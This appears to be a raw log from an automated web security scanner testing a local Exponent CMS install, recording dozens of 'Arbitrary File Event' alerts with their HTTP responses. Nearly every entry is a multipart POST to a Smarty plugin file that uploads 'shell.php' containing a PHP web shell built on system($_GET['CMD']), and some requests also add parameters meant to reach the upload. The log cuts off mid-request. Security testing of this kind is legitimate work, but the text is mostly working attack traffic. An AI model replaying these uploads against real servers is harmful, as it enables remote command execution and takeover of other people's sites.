Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:37 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.date_format.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:37 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 216 Content-Type: text/html
Fatal error: Call to a member function _get_plugin_filepath() on a non-object in C:\xampp\xampplite\htdocs\exponent\external\Smarty\libs\plugins\modifier.date_format.php on line 11
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.debug_print_var.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:37 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.default.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:37 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.escape.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:37 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.indent.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:38 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.lower.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:38 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.lower.php?expid=shell.php&ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:38 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.nl2br.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:38 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.regex_replace.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:38 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.replace.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:39 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.spacify.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:39 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.string_format.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:39 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.strip.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:39 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.strip_tags.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:40 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.truncate.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:40 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.upper.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:40 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/modifier.wordwrap.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:40 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/outputfilter.trimwhitespace.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:40 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/shared.escape_special_chars.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:41 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/plugins/shared.make_timestamp.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:41 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.assemble_plugin_filepath.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:41 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.assign_smarty_interface.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:41 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.create_dir_structure.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:41 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.display_debug_console.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:42 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.get_include_path.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:42 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.get_microtime.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:42 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.get_php_resource.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:42 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.is_secure.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:42 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.is_trusted.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:43 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.load_plugins.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:43 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.load_resource_plugin.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:43 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.process_cached_inserts.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:43 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.process_compiled_include.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:44 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.process_compiled_include.php?printerfriendly=shell.php&action=shell.php&module=shell.php§ion=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: 